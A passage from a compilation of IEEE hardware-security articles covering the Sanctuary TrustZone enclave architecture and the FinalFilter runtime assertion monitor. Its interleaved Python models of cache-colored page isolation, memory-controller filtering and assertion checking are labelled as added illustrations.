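LINE_SHIFT = 6                           # 64-byte lines (assumption)
LLC_SETS = 1024                          # sets in the shared LLC (assumption)
SET_BITS = LLC_SETS.bit_length() - 1     # set index = physical address bits 6..15
# Index bits above the page offset are fixed by the page frame number, so the
# frame number selects a "color", i.e. a slice of LLC sets: here bits 12..15.
COLOR_BITS = LINE_SHIFT + SET_BITS - PAGE_SHIFT
NUM_COLORS = 1 << COLOR_BITS
OS = "os"                                # the untrusted operating system context


def page_color(paddr: int) -> int:
    return (paddr >> PAGE_SHIFT) & (NUM_COLORS - 1)


def cache_set(paddr: int) -> int:
    return (paddr >> LINE_SHIFT) & (LLC_SETS - 1)


class SecurityMonitor:
    """Machine-mode software TCB: hands colors (and with them DRAM pages and
    LLC sets) exclusively to enclaves and keeps each context's page table."""

    def __init__(self) -> None:
        self.colors: dict[str, set[int]] = {}                   # enclave -> colors
        self.page_tables: dict[str, dict[int, int]] = {OS: {}}  # ctx -> {vpn: ppn}

    def enclave_colors(self) -> set[int]:
        return set().union(*self.colors.values())

    def create_enclave(self, name: str, colors: set[int]) -> None:
        clash = colors & self.enclave_colors()
        if clash or name in self.page_tables:
            raise ValueError(f"colors {sorted(clash)} already assigned")
        self.colors[name] = set(colors)
        self.page_tables[name] = {}          # each enclave manages its own page table

    def map_page(self, ctx: str, vpn: int, ppn: int) -> None:
        self.page_tables[ctx][vpn] = ppn     # unchecked: any context may write any mapping

    def ptw_allowed(self, ctx: str, paddr: int) -> bool:
        """The check performed on the PTW's output for the current context."""
        color = page_color(paddr)
        if ctx == OS:                        # the OS may touch no enclave memory
            return color not in self.enclave_colors()
        return color in self.colors[ctx]     # an enclave may touch only its own memory

    def translate(self, ctx: str, vaddr: int) -> int | None:
        """Physical address, or None when the walk faults."""
        ppn = self.page_tables[ctx].get(vaddr >> PAGE_SHIFT)
        if ppn is None:
            return None
        paddr = (ppn << PAGE_SHIFT) | (vaddr & PAGE_MASK)
        return paddr if self.ptw_allowed(ctx, paddr) else None

    def llc_sets_of(self, ctx: str) -> set[int]:
        """LLC sets a context can ever occupy; disjoint between partitions."""
        colors = self.colors[ctx] if ctx != OS else set(range(NUM_COLORS)) - self.enclave_colors()
        return {cache_set((color << PAGE_SHIFT) | off)
                for color in colors
                for off in range(0, 1 << PAGE_SHIFT, 1 << LINE_SHIFT)}


def sanctum_demo() -> dict:
    sm = SecurityMonitor()
    sm.create_enclave("enclave_a", {0, 1})
    sm.create_enclave("enclave_b", {2, 3})
    sm.map_page("enclave_a", 0x400, 0x10)    # frame 0x10: color 0, enclave_a's own
    sm.map_page("enclave_a", 0x401, 0x12)    # frame 0x12: color 2, belongs to enclave_b
    sm.map_page("enclave_a", 0x402, 0x15)    # frame 0x15: color 5, OS memory
    sm.map_page(OS, 0x800, 0x31)             # frame 0x31: color 1, enclave_a's memory
    sm.map_page(OS, 0x801, 0x34)             # frame 0x34: color 4, OS memory
    return {
        "enclave_own":     sm.translate("enclave_a", 0x400_010),
        "enclave_other":   sm.translate("enclave_a", 0x401_000),
        "enclave_os":      sm.translate("enclave_a", 0x402_000),
        "os_into_enclave": sm.translate(OS, 0x800_000),
        "os_own":          sm.translate(OS, 0x801_000),
        "llc_disjoint":    not (sm.llc_sets_of("enclave_a") & sm.llc_sets_of(OS)),
    }
```

Only the translation whose frame lies in the caller's own colors succeeds; the mappings the OS writes into enclave memory, and the ones a malicious enclave writes towards OS or foreign enclave memory, all fault at the walker even though nothing stopped them from being written into the page table.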

SANCTUARY: PROVIDING MULTIDOMAIN SECURITY

The limitations of TrustZone inspired the TEE architecture Sanctuary, proposed by Brasser et al. in 2019.4 In contrast to currently deployed TrustZone-based security architectures, Sanctuary, shown in Figure 2(b), provides an arbitrary number of TEEs (or enclaves) on ARM-based devices. Moreover, Sanctuary tolerates malicious code inside the TEEs and withstands cache side-channel attacks.

Sanctuary relies on TrustZone and, therefore, inherits many of its security features, such as world separation, secure boot, DMA access control, and secure communication with peripherals. In contrast to TrustZone, Sanctuary removes sensitive third-party applications from the secure world, which then contains only security primitives provided by the device vendor. Instead, each sensitive app (SA) is temporarily isolated on a physical core in a Sanctuary Instance, while the remaining CPU cores execute the normal-world and secure-world code. Thus, no trust relationship has to be established between the device vendor and the sensitive app developer, which opens TrustZone to third-party use. The isolated sensitive apps can communicate with the untrusted OS in the normal world and with the security primitives in the secure world. This communication is facilitated by a software component called the Sanctuary Library (SL), which also provides OS services to the SA. The TF and the secure-world code represent the software TCB of the system; in Sanctuary, no third-party code is included in this TCB. The SL, although also provided by the device vendor, is not part of the system TCB because it runs in the normal world.

The isolation of the physical CPU cores is enforced using a security feature of ARM's TrustZone-enabled memory controller. Sanctuary uses this feature to temporarily assign memory regions exclusively to the physical CPU cores selected to execute a sensitive app. The configuration of the memory controller, as well as the setup of the enclaves, is performed and verified by the security primitives in the secure world.

Sanctuary cannot provide hardware cache partitioning. However, software cache side-channel attacks on sensitive apps are prevented by flushing the core-exclusive caches when an enclave is set up and by excluding its code and data from the shared last-level cache.
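The following Python model, added here as an illustration and not Sanctuary's own code, shows the lifecycle of a Sanctuary Instance from the memory controller's point of view: a bus filter that checks master and world on every transaction, vendor security primitives that measure the app, carve out a region only the chosen core may touch from the normal world, record the cache flushes, and scrub the region on exit. The region layout, master names, measurement check and single-instance limit are assumptions made for this example.

```python
"""Model of the core-exclusive memory regions Sanctuary carves out with the
TrustZone memory controller. Added illustration, not Sanctuary's code; region
layout, master names, the measurement check and the flush bookkeeping are
assumptions made for this example."""
from __future__ import annotations
from dataclasses import dataclass
import hashlib

NORMAL, SECURE = "normal", "secure"          # value of the NS attribute on the bus


@dataclass
class Region:
    base: int
    size: int
    worlds: set[str]                           # worlds allowed to access the region
    masters: set[str] | None = None            # None = any bus master (core, GPU, DMA)
    llc_bypass: bool = False                   # keep the region's lines out of the shared LLC

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


class MemoryController:
    """TrustZone-aware bus filter: each transaction carries the originating
    master and its world; an address matching no region is denied."""

    def __init__(self, regions: list[Region]):
        self.regions = list(regions)
        self.cells: dict[int, int] = {}

    def allowed(self, master: str, world: str, addr: int) -> bool:
        for r in self.regions:
            if r.contains(addr):
                return world in r.worlds and (r.masters is None or master in r.masters)
        return False

    def write(self, master: str, world: str, addr: int, value: int) -> bool:
        if not self.allowed(master, world, addr):
            return False
        self.cells[addr] = value
        return True

    def read(self, master: str, world: str, addr: int) -> int | None:
        return self.cells.get(addr) if self.allowed(master, world, addr) else None


class SecurityPrimitives:
    """Vendor code in the secure world, the only code that reprograms the
    controller: measures the app, carves out a region only the chosen core
    may touch from the normal world, and scrubs it again on exit."""

    def __init__(self, mc: MemoryController, pool: Region, known_hashes: set[str]):
        self.mc, self.pool, self.known_hashes = mc, pool, known_hashes
        self.mc.regions.append(pool)           # reserved pool: empty worlds => nobody
        self.active: dict[str, Region] = {}
        self.flushes: list[str] = []           # cache maintenance, recorded for inspection

    def enter_sanctuary(self, core: str, app_image: bytes) -> bool:
        if self.active or hashlib.sha256(app_image).hexdigest() not in self.known_hashes:
            return False                       # pool busy (one instance here) or unknown binary
        self.flushes.append(f"flush core-private caches of {core}")
        region = Region(self.pool.base, self.pool.size, {NORMAL}, {core}, llc_bypass=True)
        self.mc.regions.remove(self.pool)
        self.mc.regions.append(region)
        for off, byte in enumerate(app_image):  # load the measured image into the region
            self.mc.cells[region.base + off] = byte
        self.active[core] = region
        return True

    def exit_sanctuary(self, core: str) -> None:
        region = self.active.pop(core)
        for addr in range(region.base, region.base + region.size):
            self.mc.cells.pop(addr, None)      # scrub before the memory is released
        self.flushes.append(f"flush core-private caches of {core}")
        self.mc.regions.remove(region)
        self.mc.regions.append(self.pool)


def sanctuary_demo() -> dict:
    mc = MemoryController([
        Region(0x0000_0000, 0x1000_0000, {NORMAL, SECURE}),   # normal-world DRAM
        Region(0x1000_0000, 0x0100_0000, {SECURE}),           # secure-world DRAM
    ])
    app = b"sensitive app image"                              # constructed image
    sp = SecurityPrimitives(mc, Region(0x2000_0000, 0x1_0000, set(), set()),
                            {hashlib.sha256(app).hexdigest()})
    base = 0x2000_0000
    r = {"tampered": sp.enter_sanctuary("core0", app + b"!"),
         "setup": sp.enter_sanctuary("core0", app)}
    r.update({
        "own_core": mc.write("core0", NORMAL, base + 0x100, 0x42),
        "own_core_readback": mc.read("core0", NORMAL, base + 0x100),
        "other_core_normal": mc.read("core1", NORMAL, base),
        "other_core_secure": mc.read("core1", SECURE, base),
        "dma_master": mc.read("dma", NORMAL, base),
        "secure_dram_from_normal": mc.read("core0", NORMAL, 0x1000_0000),
        "shared_dram_from_sanctuary": mc.write("core0", NORMAL, 0x1000, 1),
    })
    sp.exit_sanctuary("core0")
    r["after_exit"] = mc.read("core0", NORMAL, base + 0x100)
    r["scrubbed"] = mc.cells.get(base + 0x100)
    r["flushes"] = len(sp.flushes)
    return r
```

Note that the isolated core keeps normal-world access to shared DRAM, which is the channel the Sanctuary Library uses to talk to the OS, while neither another core (in either world) nor a DMA master can reach the instance's region.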

One of the biggest challenges for existing TEE architectures is the threat of microarchitectural attacks. The most prominent attacks in recent years were cache side-channel attacks (see Brasser et al.1) and transient execution attacks like Spectre and Meltdown.7 Most known microarchitectural attacks exploit resources that are shared across the system and exist to optimize its performance (for example, the data caches1 or the Branch Target Buffer).7

A modern TEE architecture must provide strong isolation among different security domains. However, preventing the sharing of resources entirely might lead to a drastic decrease in system performance, which would make a TEE architecture impractical. At the same time, duplicating resources and partitioning them between the security domains might lead to a high hardware overhead. Therefore, designers of TEE architectures need to find a viable tradeoff between domain isolation and resource sharing.

Moreover, designers must keep in mind that the known microarchitectural attacks are unlikely to be the end of the story. Cross-layer attacks based on hardware bugs can be diverse, as the hardware security contests Hack@DAC in 2018 and 2019 have shown.3

REFERENCES

1. F. Brasser, U. Müller, A. Dmitrienko, K. Kostiainen, S. Capkun, and A.-R. Sadeghi, "Software Grand Exposure: SGX cache attacks are practical," in Proc. 11th USENIX Workshop on Offensive Technologies (WOOT), Vancouver, BC, Canada, 2017. [Online]. Available: https://www.usenix.org/conference/woot17/workshop-program/presentation/brasser


2. "Fault attacks on secure chips: From glitch to flash," in Proc. Design and Security of Cryptographic Algorithms and Devices (ECRYPT II), Albena, Bulgaria, May 29–June 3, 2011. [Online]. Available: https://studylib.net/doc/18400951/fault-attacks-on-secure-chips–from-glitch-to-flash

3. G. Dessouky et al., "HardFails: Insights into software-exploitable hardware bugs," in Proc. 28th USENIX Security Symp., Santa Clara, CA, 2019. [Online]. Available: https://www.usenix.org/conference/usenixsecurity19/presentation/dessouky

4. F. Brasser, D. Gens, P. Jauernig, A. Sadeghi, and E. Stapf, “Sanctuary: Arming TrustZone with user-space enclaves,” in Network and Distributed System Security Symp., San Diego, CA, 2019. doi: 10.14722/ndss.2019.23448.

5. V. Costan, I. A. Lebedev, and S. Devadas, “Sanctum: Minimal hardware extensions for strong software isolation,” in Proc. 25th USENIX Security Symp., Austin, TX, 2016, pp. 213–230.

6. Intel, "Intel® Software Guard Extensions programming reference," 2014. Accessed on: Aug. 9, 2019. [Online]. Available: https://software.intel.com/sites/default/files/managed/48/88/329298-002.pdf

7. C. Canella et al., "A systematic evaluation of transient execution attacks and defenses," in Proc. 28th USENIX Security Symp., Santa Clara, CA, 2019, pp. 249–266.

8. S. Mofrad, F. Zhang, S. Lu, and W. Shi, “A comparison study of Intel SGX and AMD Memory Encryption technology,” in Proc. 7th Int. Workshop Hardware and Architectural Support Security and Privacy, New York, 2018.

9. Seclists.org, "CVE-2019-9836," 2019. Accessed on: Aug. 8, 2019. [Online]. Available: https://seclists.org/fulldisclosure/2019/Jun/46

10. ARM Limited, "Security technology: Building a secure system using TrustZone® technology," 2008. [Online]. Available: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.prd29-genc-009492c/index.html

PATRICK JAUERNIG is a researcher with TU Darmstadt. Contact him at [email protected].

AHMAD-REZA SADEGHI is a professor with TU Darmstadt. Contact him at [email protected].

EMMANUEL STAPF is a researcher with TU Darmstadt. Contact him at [email protected].


14 August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

DEPARTMENT: EXPERT OPINION

FinalFilter: Asserting Security Properties of a Processor at Runtime

Cynthia Sturton, University of North Carolina at Chapel Hill
Matthew Hicks, Virginia Tech
Samuel T. King, University of California, Davis
Jonathan M. Smith, University of Pennsylvania and DARPA

In an ideal world, it would be possible to build a provably correct and secure processor. However, the complexity of today's processors puts this ideal out of reach. The complete verification of a modern processor remains intractable. Statically verifying even a simple security property, for example, "hardware privilege escalation never occurs," remains beyond the state of the art in formal verification.

Testing can complement formal verification meth-ods, yet testing is incomplete and bugs in the hardware that leave it vulnerable continue to elude test suites. Further, a crafty malicious actor can evade typical testing coverage metrics.

Recent efforts, including that of three of the authors, have explored the use of static analysis on the design files (e.g., hardware description level source code or gate-level netlists) to find suspicious circuitry.1–3 These techniques rely on heuristics to define patterns that indicate a likely trojan and then search for instances in the design that match the pattern. However, malicious circuitry that does not match the pattern will be missed, as will inadvertent bugs that open vulnerabilities. By the time the weakness is uncovered, the hardware is already in the end user's hands and vulnerable to attack.

In the absence of a full proof of correctness, what is needed is a final filter: a runtime verification technique that works, postdeployment, to detect and respond to security property violations as they occur during execution. In this article, we make the case for final filters using our tool, FinalFilter, as a case study.

FINALFILTER

Prior research, including our own, has shown that assertions hard-coded into the design can be a cheap and effective way to verify the correctness of any single execution run.4,5 Assertions can cover properties that would be intractable to prove statically with the current state of the art. The downside is that, like all execution monitors, this approach cannot prove that the property can never be violated, only that if such a violation occurs the monitor will catch it. As such, a final filter is a verification approach that is complementary to, and should be used in conjunction with, existing testing and static verification methods.

We extend the basic idea of an assertion-based execution monitor to make it configurable so that the set of properties being monitored can be updated postdeployment to reflect new information about exploitable vulnerabilities in the design. FinalFilter is a reconfigurable, run-time verification system that monitors the state and events of the processor for invalid updates to privileged registers.

The mechanism of a final filter is simple and presents a small attack surface. Yet, making it configurable does add complexity. To minimize FinalFilter's cost to the system's trustworthiness, we formally verify the correctness properties of its component modules and of the composed system. Finally, we show how to verify key properties for individual configurations.

As a formally verified execution monitor, FinalFilter guarantees that any trace violating a given security property will be detected at the point of violation. This holds independently of how the violation occurs or what its root cause is.

This article originally appeared in vol. 39, no. 4, 2019. Digital Object Identifier 10.1109/MM.2019.2921509. Date of current version 23 July 2019.

THREAT MODEL

The trusted computing base for FinalFilter includes our specification and verification process and tools, the fabrication process and tools, and the filter's current configuration.

Lifecycle Assumptions

Referring to Figure 1, we assume we are the last ones to touch the processor design. We rely on orthogonal techniques to ensure that FinalFilter is not tampered with in the supply chain, which includes fabrication of the processor and shipping to the end user.

Architectural Scope

FinalFilter protects privileged instruction set architecture (ISA)-level registers. FinalFilter does not detect side-channel attacks, as doing so requires knowledge of more than the current trace of execution. The focus of this paper is the integer core of the processor. Notably, we assume the memory hierarchy is correct.

Attacker Model

The attacker is free to take any action not precluded by our assumptions, either in hardware or in software. This includes an attacker capable of creating and exploiting a hardware defect. An example might be a defect that causes the processor to return from an exception without restoring the privilege level.

DESIGN

FinalFilter enforces properties over privileged ISA state and events necessary for the security of software running on the processor. An example property that we will return to is, "the processor transitions from user mode to supervisor mode if, and only if, there is an interrupt or exception." Any processor that correctly implements the specification must satisfy this property. Proving this property statically requires a proof across all possible execution traces, currently an intractable task. Yet, as an execution monitor, FinalFilter can verify the property for every trace that is executed. Monitoring is done by a set of hardware-based assertions over architecturally visible state and events.

FinalFilter is designed to be used in conjunction with existing software-level recovery and repair tools. For example, BlueChip,1 a tool developed by three of the authors, can route execution around vulnerable circuitry. FinalFilter provides precise introspection points and can support a variety of repair and recovery approaches.

Three aspects of the design are worth noting.

1. FinalFilter is reconfigurable after deployment and can protect multiple security-critical properties concurrently.

2. FinalFilter's design is formally specified and its implementation proven correct.

3. Execution overhead is incurred only in the rare case that a processor violates one of the monitored security properties.

The key insight that allowed us to make the monitor both reconfigurable and able to handle multiple invariants concurrently is that many security properties can be implemented as a Boolean combination of simpler assertions, and these simple component assertions usually take one of only a few forms. Users can specify a number of simple component assertions and combine them into one or more complex assertions that monitor hardware state.

FIGURE 1. Processor design flow with FinalFilter: (a) Hardware description language implementation of the instruction set specification. (b) A vulnerability is accidentally or maliciously opened in the processor. (c) FinalFilter is added to the design as the last action,6 with taps directly on the outputs of ISA state-storing elements. (d) FinalFilter dynamically verifies the properties encoded by trusted software. FinalFilter triggers existing repair/recovery approaches in the event of an invariant violation. FinalFilter continues to protect the repair/recovery software.

Running Example

We use security invariants (or just invariants) to describe properties of the ISA that must be true of a secure implementation and that, if violated, would open an exploitable vulnerability. Invariants are dynamically verified by one or more assertions over architecturally visible state.

Consider the following component of the privilege escalation property mentioned before:

I0: A change in processor mode from low privilege to high privilege is caused only by an exception or a reset.

Invariant I0 is a statement that the instruction set specification says must be true of the system at all points of execution. It can be written as a concrete assertion in terms of the ISA-level state in the following way:

A0: assert( ((risingEdge(SM) → (NPC[31:12] = 0)) ∧ (risingEdge(SM) → (NPC[7:0] = 0))) ∨ (risingEdge(SM) → (RST = 1)) )

where SM stands for the supervisor mode bit of the processor's status register, RST for the reset signal, and an exception is indicated by the next program counter NPC pointing to an exception vector start address. The address will always be of the form 0x00000X00, where the "X" indicates a don't-care value. (This might seem as if it leaves the door open for a processor attack that escalates privilege while executing at an address that matches the form 0x00000X00, but it does not. Pages in that address range have supervisor permissions set, which implies that code executing in that address range is already in supervisor mode. If the processor attack attempts to allow user mode execution of supervisor mode pages, FinalFilter includes an invariant to detect such misbehavior.)

We break A0 into three component assertions:

Aa: assert(risingEdge(SM) → (NPC[31:12] = 0))
Ab: assert(risingEdge(SM) → (NPC[7:0] = 0))
Ac: assert(risingEdge(SM) → (RST = 1))

Each of these individual assertions is evaluated at each step of execution, and the results are combined to form a statement that is equivalent to A0.

Invariant Monitor

FinalFilter reads in ISA-level state and outputs a signal indicating whether any of the programmed invariants were violated. It works essentially as a programmable finite state machine. The configuration data program the machine with which invariants to check, and the ISA-level state acts as the input to the machine. The number of invariants it can monitor concurrently depends on the complexity of the associated component assertions and the number of assertion blocks built into the monitor.

Using our running example, we now describe each module in the configurable monitor, shown in its configured state in Figure 2. In our system, we refer to Aa, Ab, and Ac as component assertions, and to A0 simply as an assertion. The difference is that an assertion with a numeric index (A0) is the implementation of an invariant, a combination of component assertions, whereas an assertion with a letter index (Aa, Ab, Ac) represents a component assertion corresponding to one assertion block in the configurable monitor.

Routing. The Routing block is responsible for feeding the desired ISA-level state to the Logic blocks. The configuration data determine which state element gets routed to which Logic block. To accommodate arbitrary outputs, each Routing block output is 32 bits wide, with zero padding as required. In our running example, SM is output to Logic blocks 0, 2, and 4, NPC is output to Logic blocks 1 and 3, and RST is output to Logic block 5, as shown in Figure 2.

Logic. Each Logic block implements a comparison operator. Given two inputs A and B, the configuration data can select one comparison operator from the set {=, ≠, ≤, <, ≥, >}. Additionally, the configuration data can choose to mask off some portion of A or B, or both, or it can substitute a constant value for the value in B. Returning to our running example, Logic block 1 will evaluate NPC[31:12] = 0 and output the result, Logic block 3 will evaluate NPC[7:0] = 0 and output the result, and Logic block 5 will evaluate RST = 1 and output the result. Logic blocks 0, 2, and 4 will evaluate SM = 1 and output the result.

Assert. The Assert block implements component assertions of the form p → q, possibly across several clock cycles (e.g., if p is true, then three cycles later q is true). If it is ever the case that p is true while q is false, the assertion is triggered and the output of the Assert block will be high. In our example, each of Aa, Ab, and Ac is implemented in its own Assert block. The consequent q is always a combinational proposition over ISA state at a single step of execution: it is stateless and is given by the current value sent by the Logic block. However, the antecedent p can be stateful, possibly depending on previous values sent from the Logic block. For example, the individual assertions in our example all have the antecedent risingEdge(SM). This proposition is true at time t if and only if SM is low at time t−1 and high at time t. The Logic block will output a signal that is high whenever SM is high, and the Assert block will determine when a rising edge of SM is seen. FinalFilter allows antecedents in one of three forms: p ∈ {True, ¬s(t−1) ∧ s(t), s(t−n)}. In other words, p can be defined as True, in which case the assertion will trigger whenever q is false; or p can be defined to be the rising edge of some ISA state s; or p can be defined to be the value of ISA state s at time t−n, where n is also configurable.

The Assert block uses four of the industry standard Open Verification Library assertions:

› always(expression): expression must always be true,

› edge(type, trigger, expression): expression must be true when the trigger goes from 0 to 1 (type = positive),

› next(trigger, expression, cycles): expression must be true cycles clock ticks after trigger goes from 0 to 1,

› delta(signal, min, max): when signal changes value, the difference must be between min and max, inclusive.

Merge. The Merge block takes the outputs from the Assert blocks and combines them as prescribed by the configuration data. It can be viewed as a configurable truth table. The inputs to the truth table are the Assert block outputs, the component assertions Aa, Ab, and Ac in our running example. The function defining how the component assertions combine (i.e., the out function) is configurable at run time. The truth table is implemented as a hierarchy of lookup tables. For example, with 16 Assert blocks, rather than a single lookup table with 2^16 rows, the monitor would have four lookup tables with six inputs (2^6 rows) each: the outputs of the three first-level lookup tables form the input to a second-level lookup table, whose output is the output of the Merge block.

We can now complete our running example. Let erra be the output of the Assert block for Aa, and let errb and errc be the output of the Assert blocks for Ab and Ac, respectively. Remembering that the output of each Assert block will be high when the assert triggers, i.e., when the invariant is violated, we combine the results of the component assertions in the following way:

err0=(erra|errb)& errc.
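The following Python model, added here as an illustration and not FinalFilter's hardware, walks a constructed trace of ISA state through the four block types with the configuration of the running example (Routing, six Logic blocks, three Assert blocks with a rising-edge antecedent, and the Merge function err0 = (erra | errb) & errc). The signal names sm, npc and rst, the trace, and the block interfaces are assumptions that follow the text; the well-formedness check on the configuration data models the never-fires behaviour described in the Verification section.

```python
"""Cycle-level software model of FinalFilter's configurable monitor, set up
with the running example A0. Added illustration, not the authors' RTL; signal
names (sm, npc, rst), the trace and the block interfaces are assumptions."""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Callable

OPS = {"=": lambda a, b: a == b, "!=": lambda a, b: a != b, "<=": lambda a, b: a <= b,
       "<": lambda a, b: a < b, ">=": lambda a, b: a >= b, ">": lambda a, b: a > b}


@dataclass
class Logic:
    """One Logic block: compares bit field A[hi:lo] of its routed input with a constant."""
    op: str
    const: int
    hi: int = 31
    lo: int = 0

    def eval(self, a: int) -> bool:
        field_val = (a >> self.lo) & ((1 << (self.hi - self.lo + 1)) - 1)
        return OPS[self.op](field_val, self.const)


@dataclass
class Assert:
    """One Assert block, p -> q. p is True, the rising edge of Logic block
    `ant`'s output, or that output n cycles ago; q is Logic block `cons` now."""
    ant: int
    cons: int
    kind: str = "rising"                 # "always" | "rising" | "delay"
    n: int = 0
    history: list[bool] = field(default_factory=list)

    def step(self, logic_out: list[bool]) -> bool:
        self.history.append(logic_out[self.ant])
        h = self.history
        if self.kind == "always":
            p = True
        elif self.kind == "rising":
            p = len(h) > 1 and h[-1] and not h[-2]
        else:                            # value of the antecedent signal n cycles ago
            p = len(h) > self.n and h[-1 - self.n]
        return p and not logic_out[self.cons]   # high = assertion triggered


class Monitor:
    def __init__(self, routing, logic, asserts, merge: Callable[[list[bool]], bool]):
        self.routing, self.logic, self.asserts, self.merge = routing, logic, asserts, merge
        # Well-formedness check of the configuration data: a malformed fabric
        # never fires (the tradeoff discussed in the Verification section).
        self.valid = (len(routing) == len(logic) and all(l.op in OPS for l in logic)
                      and all(0 <= a.ant < len(logic) and 0 <= a.cons < len(logic)
                              and a.kind in ("always", "rising", "delay") for a in asserts))

    def step(self, state: dict) -> bool:
        if not self.valid:
            return False
        logic_out = [blk.eval(state[name]) for name, blk in zip(self.routing, self.logic)]
        errs = [a.step(logic_out) for a in self.asserts]
        return self.merge(errs)


def a0_monitor() -> Monitor:
    """Configuration data for A0: sm is the supervisor-mode bit, npc the next
    program counter, rst the reset signal (constructed names)."""
    return Monitor(
        routing=["sm", "npc", "sm", "npc", "sm", "rst"],
        logic=[Logic("=", 1, 0, 0), Logic("=", 0, 31, 12),     # blocks 0, 1
               Logic("=", 1, 0, 0), Logic("=", 0, 7, 0),       # blocks 2, 3
               Logic("=", 1, 0, 0), Logic("=", 1, 0, 0)],      # blocks 4, 5
        asserts=[Assert(0, 1), Assert(2, 3), Assert(4, 5)],    # Aa, Ab, Ac
        merge=lambda e: (e[0] or e[1]) and e[2],               # err0 = (erra|errb)&errc
    )


# Constructed trace: the ISA state visible to the monitor at each step.
TRACE = [
    {"sm": 0, "npc": 0x00001000, "rst": 0},
    {"sm": 1, "npc": 0x00000900, "rst": 0},   # exception: vector 0x900, legal entry
    {"sm": 1, "npc": 0x00000904, "rst": 0},   # no rising edge, nothing to check
    {"sm": 0, "npc": 0x00002000, "rst": 0},   # back to user mode
    {"sm": 1, "npc": 0x00002004, "rst": 0},   # supervisor with no exception and no reset
    {"sm": 0, "npc": 0x00002008, "rst": 0},
    {"sm": 1, "npc": 0x00000100, "rst": 1},   # reset: legal entry
    {"sm": 1, "npc": 0x00000104, "rst": 0},
]


def violations(monitor: Monitor, trace: list[dict]) -> list[int]:
    """Steps at which the monitor would drive the processor's exception line."""
    return [t for t, state in enumerate(trace) if monitor.step(state)]
```

Running `violations(a0_monitor(), TRACE)` flags only step 4, the silent privilege escalation; the exception entry at step 1 and the reset at step 6 pass because one branch of the Merge function is satisfied in each case.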

FIGURE 2. FinalFilter configured with assertion A0. Starting from the top of the figure, the components are: ISA-level state, Routing block, Logic blocks, Assert blocks, and Merge block. The Routing block sends ISA-level state elements to the Logic blocks; the Logic blocks condense multibit state and constant inputs down to a single-bit output that is sent to the Assert block; the Assert block compares the previous value of its inputs to the current value, outputting the result as a one-bit value to the Merge block; the Merge block combines the Assert block results to form a higher-level result that indicates whether the programmed invariants still hold; this result is tied to the processor's exception generation logic.


As desired, err0 will be high whenever A0 is false, i.e., whenever the A0 assertion is triggered.

Configuration Data. The configuration data are pro-vided by trusted software (e.g., the system BIOS) at ini-tialization (originally, we imagine configuration coming from processor or motherboard manufacturers). It is the mechanism by which FinalFilter is configured, and portions of the configuration data are fed into each block at the appropriate stage.

VERIFICATION

We used the commercial model checking tool Cadence SMV for the verification of the configurable assertion fabric. For each component of FinalFilter shown in Figure 2, we formally specified its behavior and verified that the implementation meets the specification.

In most cases, formally specifying a component's behavior involved little more than extracting the information from the design documents. However, in two cases, the process of formalizing the specification brought out ambiguities in the design, and it was necessary to revisit the design phase of the process. During the course of verification, we found one implementation error: a logical and was used where an or was needed.

Ultimately, the monitor's behavior is determined by the configuration data, and it is up to the processor or motherboard manufacturer to provide a correct configuration. A misconfigured fabric could fail to provide the intended protections. We guard against misconfigurations in three ways.

First, we protect against invalid configurations that would result in unpredictable results. Built into the design of each block is a check that the incoming configuration data are well formed. We verify that if any of the individual components report an invalid configuration, then FinalFilter will not fire any assertion failures. This behavior represents a tradeoff in the design space. On the one hand, an accidentally misconfigured fabric, which will never trigger an assertion, is not protecting the user. On the other hand, never firing in the presence of misconfigured data has the benefit of being a stable behavior: it is what exists today. An alternative is to always fire when the fabric is misconfigured, but this would give an attacker an avenue for launching a denial-of-service attack, making FinalFilter a new avenue of attack, something we wish to avoid.

Second, we built a software tool to generate the configuration data from higher-level assertion statements. Although only prototypical, we hope that further developing this tool will make generating correct configuration data relatively easy for the user.

Third, we built a validation tool to prove properties about individual configurations. We prove the following sanity checks on the configuration data:

› There are assertions configured.
› None of the assertions are unsatisfiable (e.g., the following does not occur { q q}).
› The configured assertions, as a whole, are satisfiable (e.g., the following does not occur {p q; p q}).
› Assertions are not trivially violated (e.g., the following does not occur {p p}).

If any of these checks fail, a misconfiguration error is reported along with information about the offending assertion(s). The user can run this tool before loading the configuration data into FinalFilter. We used the z3 SMT solver as the back end to this tool.
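The following Python code, added here as an illustration and not the authors' validation tool, implements the four sanity checks above for component assertions of the form p → q whose p and q are Boolean functions of named single-step predicates. It enumerates truth assignments instead of calling z3, so it runs offline on small configurations; the precise meaning given to each check, the predicate names and the example configurations are this editor's constructions.

```python
"""Exhaustive version of the configuration sanity checks, for component
assertions p -> q over named single-step ISA predicates. Added illustration:
the authors used z3; this enumerates truth assignments instead, and the
meaning given to each check is this editor's reading of the list."""
from __future__ import annotations
from itertools import product
from typing import Callable, Dict, List, Tuple

Env = Dict[str, bool]
Prop = Callable[[Env], bool]
Assertion = Tuple[str, Prop, Prop]            # (name, antecedent p, consequent q)


def all_assignments(atoms: List[str]) -> List[Env]:
    return [dict(zip(atoms, bits)) for bits in product((False, True), repeat=len(atoms))]


def check_configuration(atoms: List[str], assertions: List[Assertion]) -> List[str]:
    """Returns misconfiguration reports; an empty list means the configuration passes."""
    if not assertions:
        return ["no assertions configured"]
    envs = all_assignments(atoms)
    problems: List[str] = []
    for name, p, q in assertions:
        if not any((not p(e)) or q(e) for e in envs):
            problems.append(f"{name}: unsatisfiable, p -> q holds in no state")
        if not any(p(e) for e in envs):
            problems.append(f"{name}: vacuous, antecedent p is never true")
        elif not any(p(e) and q(e) for e in envs):
            problems.append(f"{name}: trivially violated, q is false whenever p holds")
    if not any(all((not p(e)) or q(e) for _, p, q in assertions) for e in envs):
        problems.append("configuration as a whole is unsatisfiable")
    return problems


# Atoms stand for the single-step predicates the Logic blocks would compute
# (constructed names): rising edge of the supervisor bit, the two NPC field
# tests, and the reset line.
ATOMS = ["sm_rise", "npc_hi_zero", "npc_lo_zero", "rst"]

A0_COMPONENTS: List[Assertion] = [
    ("Aa", lambda e: e["sm_rise"], lambda e: e["npc_hi_zero"]),
    ("Ab", lambda e: e["sm_rise"], lambda e: e["npc_lo_zero"]),
    ("Ac", lambda e: e["sm_rise"], lambda e: e["rst"]),
]

# Constructed misconfigurations, one per check.
BAD_CONFIGS: Dict[str, List[Assertion]] = {
    "empty": [],
    "unsatisfiable": [("X", lambda e: True, lambda e: e["rst"] and not e["rst"])],
    "trivially_violated": [("X", lambda e: e["sm_rise"], lambda e: not e["sm_rise"])],
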